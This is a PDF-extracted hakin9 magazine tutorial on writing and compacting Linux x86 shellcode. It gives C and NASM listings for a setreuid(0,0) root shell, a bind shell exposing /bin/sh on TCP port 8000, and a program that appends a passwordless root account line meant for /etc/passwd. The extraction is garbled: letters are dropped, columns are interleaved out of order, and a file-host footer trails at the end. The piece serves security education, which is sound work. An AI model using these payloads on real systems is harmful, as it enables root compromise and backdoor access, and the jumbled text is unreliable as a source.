2005.05_Linux shellcode optimisation_[Programming].pdf

Linux shellcode

optimisation

Michał Piotrowski

A shellcode is an essential

part of any exploit. During

attack, it is injected into the

target application and performs

the desired actions within it.

However, the basic rules for

building shellcodes are not too

widely known, even though they

don't require advanced skills.

a bytecode ) is a sequence of com-

mands in machine code, constituting

a vital element of all buffer overlow exploits.

During attack, the exploit injects its shellcode

into a running application, causing it to execute

the intruder's commands within the target pro-

gram. The name shellcode originates from the

earliest codes of this type, whose purpose was

to bring up the system shell (in UNIX-based

system, the shell is the /bin/sh program). The

term currently encompasses all manner of

codes, performing a huge variety of actions.

Any shellcode has to fulill a number of re-

quirements. The irst is that it cannot contain

null bytes ( 0x00 ), since these signify the end of

a character string and terminate processing for

many functions commonly exploited for buffer

overlows – strcpy() , strcat() , sprintf() , gets()

etc. A shellcode must also be autonomous and

operate independently of its current address in

memory, so static addressing cannot be used.

Other features which can occasionally be sig-

niicant are the size and ASCII character set of

the shellcode.

Let's have a look at writing shellcodes in

practice. We will create four programs with

different functionality and then go on to modify

them so as to compact and adapt them for use

in actual exploits. Note that we will be looking

exclusively at shellcodes, not buffer overlow

attacks or writing exploits.

To create an operational shellcode, we'll

need a thorough understanding of assembly

language for the shellcode's target processor

(see Inset Registers and instructions ). We'll

be working on 32-bit x86 processors running

the Linux operating system with the 2.4 kernel

– all examples work with 2.6 series of Linux

kernel, too – so we have a choice of two main

assembler syntax conventions: AT&T and Intel.

What you will learn...

• how to write a working shellcode,

• how modify and compact it.

What you should know...

• you should be familiar with the Linux operating

system,

• the basics of programming in C and assem-

bler.

www.hakin9.org

hakin9 5/2005

~ t q w ~

A shellcode (sometimes also called

Linux shellcodes

Registers

and instructions

Registers (see Table 1) are small

memory cells within the CPU, used for

storing the numerical values required

by the processor during program ex-

ecution. In 32-bit x86 CPUs, the size

of the registers is 32 bits (4 bytes).

Registers can be divided according to

their purpose into data registers (EAX,

EBX, ECX, EDX) and address registers

(ESI, EDI, ESP, EBP, EIP).

Data registers are divided up into

smaller sections of 16 bits (AX, BX, CX,

DX) and 8 bits (AH, AL, BH, BL, CH,

CL, DH, DL). The smaller registers can

be used to decrease code size and get

rid of padding null bytes (see Figure 1).

Most of the address registers have their

own speciic uses and should not be

used for storing ordinary data.

Table 1. Registers in an x86 processor and their purposes

EAX, AX, AH, AL

– accumulator

Arithmetical operations, I/O operations and specify-

ing the required system call. Also holds the value

returned by a system call.

EBX, BX, BH, BL

– base register

Used for indirect memory addressing. Also holds

the irst argument of a system call.

ECX, CX, CH, CL

– counter

Typically used as a loop counter. Also holds the

second argument of a system call.

EDX, DX, DH, DL

– data register

Used to store variable addresses. Also holds the

third argument of a system call.

ESI – source ad-

dress, EDI – target

address

Typically used for manipulating long data sequenc-

es, including strings and arrays.

ESP – stack top

pointer

Holds the address of the top of the stack.

EBP – base pointer,

frame pointer

Holds the address of the bottom of the stack. Used

to refer to local variables stored in the current stack

frame.

Although AT&T syntax is used by the

majority of compilers and debuggers

(including gcc and gdb ), we will use

Intel syntax for its greater clarity. All

examples will be compiled using the

Netwide Assembler ( nasm ) version

0.98.35, available in most popular

Linux distributions. We will also use

the ndisasm and hexdump utilities.

Assembly language instructions

are basically symbolic processor

commands. There are quite many of

them, and the most important ones

can be divided into:

EIP – instruction

pointer

Holds the address of the next instruction to be

executed.

Table 2. Summary of the most useful assembler instructions

Instruction

Description

mov – move Copies the contents of one memory

segment into another: mov <target>,

<source> .

push – put value on the stack Copies the contents of a memory seg-

ment onto the stack: push <source> .

pop – get value from the stack Moves value from the stack into the speci-

ied memory segment: pop <target> .

add – arithmetic addition Adds the contents of one memory seg-

ment to another: add <target>, <source> .

sub – arithmetic subtraction Subtracts the contents of one memory

segment from another: sub <target>,

<source> .

• move instructions ( mov , push , pop ),

• arithmetical instructions ( add , sub ,

inc , neg , mul , div ),

• logical instructions ( and , or , xor ,

not ),

• control low instructions ( jmp , call ,

int , ret ),

xor – exclusive OR

Calculates the symmetric difference of

two speciied memory segments: xor

<target>, <source> .

jmp – jump

Writes the speciied address to the EIP

call – call

Works like jmp , but before writing to the

EIP register it puts the address of the next

instruction on the stack: call <address> .

lea – load address

Writes the address of the <source>

segment to the <target> segment: lea

<target>, <source> .

int – interrupt

Sends the speciied signal to the system

kernel, calling the interrupt with the speci-

ied number: int <value> .

Figure 1. Structure of the EAX

hakin9 5/2005

www.hakin9.org

~ t q w ~

Listing 1. The write.c ile

Listing 4. The bind.c ile

Our inal and most advanced pro-

gram is called bind (see Listing 4).

When executed, the program listens

on TCP port 8000 and upon receiv-

ing an incoming connection transfers

communication to a running shell.

This imitates the mode of operation

of typical exploits used against net-

work servers.

Figure 2 illustrates the compila-

tion process and the effect of running

the programs.

#include <stdio.h>

#include <unistd.h>

#include <sys/socket.h>

#include <netinet/in.h>

main ()

{

char * line = "hello, world! \n " ;

write ( 1 , line , strlen ( line ));

exit ( 0 );

}

int main ()

{

char * name [ 2 ];

int fd1 , fd2 ;

struct sockaddr_in serv ;

name [ 0 ] = "/bin/sh" ;

name [ 1 ] = NULL ;

serv . sin_addr . s_addr = 0 ;

serv . sin_port = htons ( 8000 );

serv . sin_family = AF_INET ;

fd1 = socket ( AF_INET ,

SOCK_STREAM , 0 );

bind ( fd1 , ( struct

sockaddr *)& serv , 16 );

listen ( fd1 , 1 );

fd2 = accept ( fd1 , 0 , 0 );

dup2 ( fd2 , 0 );

dup2 ( fd2 , 1 );

dup2 ( fd2 , 2 );

execve ( name [ 0 ] , name , NULL );

}

Listing 2. The add.c ile

#include <stdio.h>

#include <fcntl.h>

On to assembler

Now that we know our applications

are working as they should, we can

go on to rewriting them in assem-

bler. Our general aim is to execute

the same system functions as in

the C programs, but to do this we

need to know the system numbers

assigned to the functions. This

information can be obtained from

the /usr/include/asm/unistd.h ile

– the write() function is number

4, exit() is 1, open() is 5, close()

is 6, setreuid() is 70, execve() is

11 and dup2() is 63. Socket ma-

nipulation functions are a slightly

different story – socket() , bind() ,

listen() and accept() are all served

by the same system call socketcall

(number 102).

We also need to provide the

functions with the necessary argu-

ments. The irst program only uses

write() and exit() , so the matter is

simple. The write() function takes

three arguments: the target ile

descriptor, a pointer to source data

buffer and the number of charac-

ters to be written. The exit() func-

tion only takes one argument – the

exit status.

main ()

{

char * name = "/ile" ;

char * line =

"toor:x:0:0::/:/bin/bash \n " ;

int fd ;

fd = open ( name ,

O_WRONLY | O_APPEND );

write ( fd , line , strlen ( line ));

close ( fd );

exit ( 0 );

}

put, appending data to a ile, starting

the system shell and binding the

shell to a TCP port. We will start writ-

ing the programs in C, as it's much

easier to translate a ready program

into assembler than to write it in as-

sembler from scratch.

The irst program is simply called

write – Listing 1 presents its source

code. Its sole purpose is to write the

message stored in the line variable

to the standard output.

Listing 2 shows another program,

this time called add . Its purpose is to

open a ile called /ile in writeable

mode (the ile may be empty, but it

has to exist) and appending to it the

line toor:x:0:0::/:/bin/bash . In real-

ity we should be appending this en-

try to the /etc/passwd ile, but for the

time being it will be safer to refrain

from modifying the password ile.

The third program, called shell ,

is a classic shellcode. Its task is

to run /bin/sh after executing the

setreuid(0, 0) function to restore

system privileges to the running

process (this is necessary when

attacking the suid program, as this

casts away its system privileges for

security reasons). Listing 3 shows

the source of the shell program.

Listing 3. The shell.c ile

#include <stdio.h>

main ()

{

char * name [ 2 ];

name [ 0 ] = "/bin/sh" ;

name [ 1 ] = NULL ;

setreuid ( 0 , 0 );

execve ( name [ 0 ] ,

name , NULL );

}

• instructions for manipulating bits,

bytes and character strings ( shl ,

shr , rol , ror ),

• input/output instructions ( in , out ),

• lag control instructions.

Write

Listing 5 presents the source code

of the assembler equivalent of the

write program. Lines 1 and 4 con-

tain declarations for the data sec-

tion ( .data ) and code section ( .text ).

Line 6 marks the default ELF linker

entry point, which has to be a global

symbol due to the use of the ld linker

(line 5). Line 2 deines the msg vari-

able – a string of byte-size charac-

ters (the db parameter), terminated

We won't go into all the available

instructions, but rather we'll con-

centrate on just the ones we need.

Table 2 presents a brief summary of

the required instructions.

Building the shellcode

Our aim is to write four shellcodes,

performing four different operations:

writing a string to the standard out-

www.hakin9.org

hakin9 5/2005

~ t q w ~

Linux shellcodes

Listing 5. The write1.asm ile

1 : section . data

2 : msg db 'hello, world!' , 0x0a

3 :

4 : section . text

5 : global _start

6 : _start :

7 :

8 : ; write(1, msg, 14)

9 : mov eax , 4

10 : mov ebx , 1

11 : mov ecx , msg

12 : mov edx , 14

13 : int 0x80

14 :

15 : ; exit(0)

16 : mov eax , 1

17 : mov ebx , 0

18 : int 0x80

specify the function's two param-

eters:

• the address of the name variable,

stored in the EBX register;

• the value 1025 (the numeric

representation of the combined

O _ WRONLY and O _ APPEND lags),

stored in the ECX register.

Figure 2. Compilation and execution of the write, add, shell and bind

programs

After it is executed, the open() func-

tion returns its result (the descriptor

number for the opened ile) into the

EAX register. We'll need the descrip-

tor value to execute the write() and

close() functions, so in line 15 we

move it into the EBX register. Thus,

the next function to be called (i.e.

write() ) has its irst argument (the

descriptor number) in the right place

(the EBX register). Now we put 4 in

the EAX register and 24 (the length

of the appended line) in the ECX reg-

ister, and transfer execution to the

system kernel (line 21).

We then need to close /ile by

calling close() (the EAX register

should contain 6, while EBX still

holds the descriptor number for the

opened ile) and we can end the pro-

gram by calling exit() (with 1 in EAX

and 0 in EBX). Figure 4 presents the

compilation and execution of the

program.

with a line feed character ( 0x0a ).

Lines 8 and 15 are comments and

are ignored by the compiler. Lines

9–13 and 16–18 contain instructions

preparing and executing the write()

and exit() functions. Let's take

a closer look at them.

To start with, we write the value

of the system call to be executed into

the EAX register ( write is number 4)

and put the function arguments

into the appropriate registers: EBX

should contain the standard output

descriptor (number 1), ECX is illed

with the starting address of the

string to be written (stored in the

msg variable), and EDX holds the

string length (14 characters includ-

ing the line feed). We then execute

the instruction int 0x80 which takes

execution into kernel mode and ex-

ecutes the relevant system function.

The same mechanism applies to the

exit() function – we put its number

(1) in the EAX registry, write 0 to EBX

and enter kernel mode once again.

Figure 3 presents the compilation

and execution of our irst program

rewritten in assembler.

Add

Listing 6 shows the code of the

assembler rewrite of our second

program, add . As you can see, it is

slightly more complicated than the

previous example.

We start by declaring two char-

acter variables in the data section

– name and line . They contain re-

spectively the name of the ile to be

modiied and the line we want to ap-

pend. Opening the ile /ile requires

us to put the value for the open()

function (5) in the EAX register and

Shell

The shell program needs to be rewrit-

ten in a similar way – Listing 7 shows

hakin9 5/2005

www.hakin9.org

~ t q w ~

Figure 3. Effect of executing the write1 program

called (1 for socket() , 2 for bind() , 4

for listen() and 5 for accept() ) and

the address of the memory segment

containing arguments for the subrou-

tine. Let's have a closer look at how

the socket() (lines 9–16) and bind()

(lines 21–35) functions are called.

As you can see in Listing 4,

socket() takes three arguments:

• protocol family ( AF _ INET – Inter-

net protocols),

• protocol type ( SOCK _ STREAM

– connection protocol),

• the protocol itself (0 – TCP).

Figure 4. Effect of executing the add1 program

We need to store the arguments

somewhere in memory – the best

place will be the stack (lines 9–11),

but we'll need to push values onto

the stack in reverse order, since a

stack is a FIFO list, so values are re-

trieved from last to irst. Starting with

line 9, we push the third argument

onto the stack (0), then the second

(1 – SOCK _ STREAM ) and inally the irst

(2 – AF _ INET ). Once that's done, we

can specify arguments for the call to

socketcall() :

the resulting source code. We won't go

into detail over it, but rather we'll take

a closer look at the seemingly complex

execve() function call (lines 15–21).

The irst argument of the

execve() function is the character

string (line 16) specifying the path

to the executed program ( /bin/sh ).

The second argument is an array

containing at least two elements:

the path string and a NULL value. To

prepare this array, we must resort

to using the stack, irst putting the

second array element on the stack

( NULL – line 17) and then the irst ele-

ment (the address of the name string

– line 18). Then we set the second

function argument (line 19) using

the ESP register, which holds the

address of the top of the stack and

therefore the starting address of

our array. The third and inal argu-

ment is handled simply by loading

0 into the EDX register (as shown in

line 20). The complete program is

compiled and run just like our other

programs.

Listing 6. The add1.asm ile

1 : section . data

2 : name db '/ ile ', 0

3 : line db

' toor : x : 0 : 0 ::/:/ bin / bash ',

0x0a

4 :

5 : section . text

6 : global _start

7 : _start :

8 :

9 : ; open(name,

O_WRONLY|O_APPEND)

10 : mov eax , 5

11 : mov ebx , name

12 : mov ecx , 1025

13 : int 0x80

14 :

15 : mov ebx , eax

16 :

17 : ; write(fd, line, 24)

18 : mov eax , 4

19 : mov ecx , line

20 : mov edx , 24

21 : int 0x80

22 :

23 : ; close(fd)

24 : mov eax , 6

25 : int 0x80

26 :

27 : ; exit(0)

28 : mov eax , 1

29 : mov ebx , 0

30 : int 0x80

• load 102 into EAX (line 13),

• load EBX with the socket() sub-

routine number (line 14),

• load ECX with the address of

socket() subroutine arguments

Listing 7. The shell1.asm ile

1 : section . data

2 : name db '/bin/sh' , 0

3 :

4 : section . text

5 : global _start

6 : _start :

7 :

8 : ; setreuid(0, 0)

9 : mov eax , 70

10 : mov ebx , 0

11 : mov ecx , 0

12 : int 0x80

13 :

14 : ; execve("/bin/sh",

["/bin/sh", NULL], NULL)

15 : mov eax , 11

16 : mov ebx , name

17 : push 0

18 : push name

19 : mov ecx , esp

20 : mov edx , 0

21 : int 0x80

Bind

The last of our shellcodes is the most

complicated and requires a more de-

tailed explanation due to the speciic

way of calling socket functions. List-

ing 8 presents the assembler version

of the bind program.

The socket() , bind() , listen()

and accept() functions are served

by the same system call ( socket-

call ), which takes two arguments:

the number of the subroutine to be

www.hakin9.org

hakin9 5/2005

~ t q w ~

Plik z chomika:

Inne pliki z tego folderu:

Inne foldery tego chomika: